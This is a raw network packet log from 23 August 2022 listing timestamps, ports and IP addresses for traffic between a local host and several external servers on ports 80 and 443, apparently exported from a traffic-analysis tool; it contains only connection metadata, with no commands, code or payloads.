Aug 23, 2022 18:24:04.723531008 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.723583937 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.723604918 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.723615885 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.724277973 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.724467993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.724492073 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.724539042 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.724576950 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.724627972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.724652052 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.724684000 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.724700928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.724735022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.724752903 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.724865913 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.724884033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.724936962 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.728260040 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.728285074 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.728307009 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.728322029 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.728382111 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.728399038 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.728431940 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.728852034 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.728876114 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.728898048 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.728933096 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.728950024 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.728959084 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.728967905 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.728976011 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.728990078 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.729017019 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.729043961 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.729064941 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.729087114 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.729108095 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.729130983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.729147911 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.729171991 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.729192972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.729212046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.729266882 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:06.497306108 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:06.497395992 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:06.532139063 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:06.532165051 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:06.532183886 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:06.722347021 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:06.723604918 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:19.095395088 CEST	49764	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:19.095416069 CEST	443	49764	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:21.583583117 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:21.583707094 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:21.617717028 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:21.617749929 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:21.617760897 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:21.738879919 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:21.738965988 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:24.414096117 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:24.414278030 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:24.459889889 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:24.459938049 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:24.460316896 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:24.460340977 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:24.460364103 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:24.460437059 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:24.460829973 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:24.506131887 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:24.506167889 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:24.506402016 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:24.506445885 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:24.506494999 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:24.506527901 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:24.506557941 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:24.698539019 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:24.698843002 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:25.751394033 CEST	443	49828	148.251.234.83	192.168.2.3
Aug 23, 2022 18:24:25.752285957 CEST	443	49828	148.251.234.83	192.168.2.3
Aug 23, 2022 18:24:25.752379894 CEST	49828	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:24:25.896500111 CEST	49828	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:24:25.896545887 CEST	443	49828	148.251.234.83	192.168.2.3
Aug 23, 2022 18:24:28.043772936 CEST	49871	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:28.043807983 CEST	443	49871	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:28.043900013 CEST	49871	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:28.049689054 CEST	49871	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:28.049735069 CEST	443	49871	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:28.095222950 CEST	443	49871	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:28.166762114 CEST	49871	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:28.171309948 CEST	49871	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:28.171336889 CEST	443	49871	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:28.172000885 CEST	443	49871	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:28.353585005 CEST	49871	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:28.353796959 CEST	443	49871	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:28.354115009 CEST	49871	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:28.382999897 CEST	443	49871	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:28.383121014 CEST	443	49871	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:28.383230925 CEST	49871	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:28.637690067 CEST	49871	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:28.637729883 CEST	443	49871	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:28.638367891 CEST	49872	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:28.638394117 CEST	443	49872	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:28.638478994 CEST	49872	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:28.639642000 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:28.639681101 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:28.639808893 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:28.639998913 CEST	49872	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:28.640028954 CEST	443	49872	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:28.640227079 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:28.640253067 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:28.711014032 CEST	443	49872	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:28.711453915 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:28.765562057 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:28.786375999 CEST	49872	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:28.852001905 CEST	49872	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:28.852029085 CEST	443	49872	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:28.852355957 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:28.852380037 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:28.854706049 CEST	443	49872	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:28.854728937 CEST	443	49872	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:28.854875088 CEST	49872	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:28.855854034 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:28.855917931 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:28.855995893 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:28.965074062 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:29.020426989 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:29.020683050 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.022924900 CEST	49872	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:29.023123980 CEST	443	49872	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.023207903 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:29.023245096 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.025960922 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:29.026046038 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.084999084 CEST	49872	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:29.085025072 CEST	443	49872	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.095710993 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.096745014 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.096847057 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.096852064 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:29.096880913 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.096947908 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:29.096956015 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.099868059 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.099992990 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:29.100028038 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.100198984 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.100251913 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:29.100260973 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.101628065 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.101712942 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:29.101732969 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.103125095 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.103235006 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:29.103255033 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.116307974 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.116394043 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.116415024 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:29.116447926 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.116498947 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:29.116627932 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.118104935 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.118186951 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.118212938 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:29.118232965 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.118278980 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:29.119574070 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.120942116 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.121057034 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:29.121078968 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.121098042 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.121165037 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:29.141196012 CEST	49873	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:29.141237974 CEST	443	49873	216.58.209.35	192.168.2.3
Aug 23, 2022 18:24:29.185028076 CEST	49872	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:24:32.588682890 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:32.591470003 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:32.625668049 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:32.625756979 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:32.629125118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:32.629149914 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:32.629165888 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:32.629183054 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:32.629200935 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:32.629214048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:32.629215956 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:32.629231930 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:32.629250050 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:32.629278898 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:32.629359007 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:32.661843061 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:32.664429903 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:32.664659023 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:32.664760113 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:32.787587881 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:32.787668943 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:34.605590105 CEST	49764	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:34.605994940 CEST	443	49764	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:34.606071949 CEST	443	49764	8.8.8.8	192.168.2.3
Aug 23, 2022 18:24:34.606095076 CEST	49764	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:34.606122017 CEST	49764	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:24:43.540734053 CEST	49892	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:43.540766954 CEST	443	49892	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:43.540879011 CEST	49892	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:43.541301966 CEST	49892	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:43.541312933 CEST	443	49892	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:43.600555897 CEST	443	49892	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:43.709661007 CEST	49892	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:43.709681034 CEST	443	49892	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:43.711474895 CEST	443	49892	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:43.711497068 CEST	443	49892	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:43.711585045 CEST	49892	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:43.714998960 CEST	49892	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:43.715164900 CEST	443	49892	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:43.715456963 CEST	49892	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:43.715468884 CEST	443	49892	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:43.775151968 CEST	443	49892	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:43.775391102 CEST	49892	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:43.775418997 CEST	443	49892	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:43.776480913 CEST	443	49892	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:43.778218985 CEST	49892	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.030210972 CEST	49892	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:44.030242920 CEST	443	49892	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:48.956155062 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:25:12.714144945 CEST	49924	443	192.168.2.3	104.22.0.232
Aug 23, 2022 18:25:12.714196920 CEST	443	49924	104.22.0.232	192.168.2.3
Aug 23, 2022 18:25:12.714284897 CEST	49924	443	192.168.2.3	104.22.0.232
Aug 23, 2022 18:25:12.742575884 CEST	49924	443	192.168.2.3	104.22.0.232
Aug 23, 2022 18:25:12.742600918 CEST	443	49924	104.22.0.232	192.168.2.3
Aug 23, 2022 18:25:12.796767950 CEST	443	49924	104.22.0.232	192.168.2.3
Aug 23, 2022 18:25:12.796892881 CEST	49924	443	192.168.2.3	104.22.0.232
Aug 23, 2022 18:25:12.799964905 CEST	49924	443	192.168.2.3	104.22.0.232
Aug 23, 2022 18:25:12.799984932 CEST	443	49924	104.22.0.232	192.168.2.3
Aug 23, 2022 18:25:12.800365925 CEST	443	49924	104.22.0.232	192.168.2.3
Aug 23, 2022 18:25:12.900222063 CEST	49924	443	192.168.2.3	104.22.0.232
Aug 23, 2022 18:25:14.110743999 CEST	49872	443	192.168.2.3	216.58.209.35
Aug 23, 2022 18:25:14.110768080 CEST	443	49872	216.58.209.35	192.168.2.3
Aug 23, 2022 18:25:14.255594015 CEST	49924	443	192.168.2.3	104.22.0.232
Aug 23, 2022 18:25:14.303368092 CEST	443	49924	104.22.0.232	192.168.2.3
Aug 23, 2022 18:25:14.335052013 CEST	443	49924	104.22.0.232	192.168.2.3
Aug 23, 2022 18:25:14.355180979 CEST	49924	443	192.168.2.3	104.22.0.232
Aug 23, 2022 18:25:14.355266094 CEST	443	49924	104.22.0.232	192.168.2.3
Aug 23, 2022 18:25:14.355423927 CEST	49924	443	192.168.2.3	104.22.0.232
Aug 23, 2022 18:25:14.432403088 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.432470083 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.432589054 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.433384895 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.433418036 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.478329897 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.478463888 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.489165068 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.489187956 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.489476919 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.501595974 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.537549973 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.537705898 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.537765980 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.537801981 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.537815094 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.537832022 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.537866116 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.537930012 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.537972927 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.537990093 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.538052082 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.538098097 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.538105965 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.538120031 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.538167953 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.538182020 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.538235903 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.538280964 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.538283110 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.538295984 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.538341999 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.538355112 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.538461924 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.538508892 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.538511038 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.538537025 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.538597107 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.538611889 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.538667917 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.538714886 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.538714886 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.538728952 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.538770914 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.538784981 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.538850069 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.538897038 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.538907051 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.538923979 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.538976908 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.538990021 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.539035082 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.539078951 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.539084911 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.539098024 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.539144993 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.539155006 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.539200068 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.539246082 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.539247036 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.539261103 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.539334059 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.539391994 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.539407969 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.539426088 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.539450884 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.539479017 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.539524078 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.539525032 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.539536953 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.539593935 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.539608002 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.539629936 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.539685011 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.539695978 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.539743900 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.554814100 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.554904938 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.554929018 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.554951906 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.554970980 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.554991007 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.555005074 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.555012941 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.555027962 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.555044889 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.555088043 CEST	49925	443	192.168.2.3	162.159.133.233
Aug 23, 2022 18:25:14.555097103 CEST	443	49925	162.159.133.233	192.168.2.3
Aug 23, 2022 18:25:14.555141926 CEST	49925	443	192.168.2.3	162.159.133.233
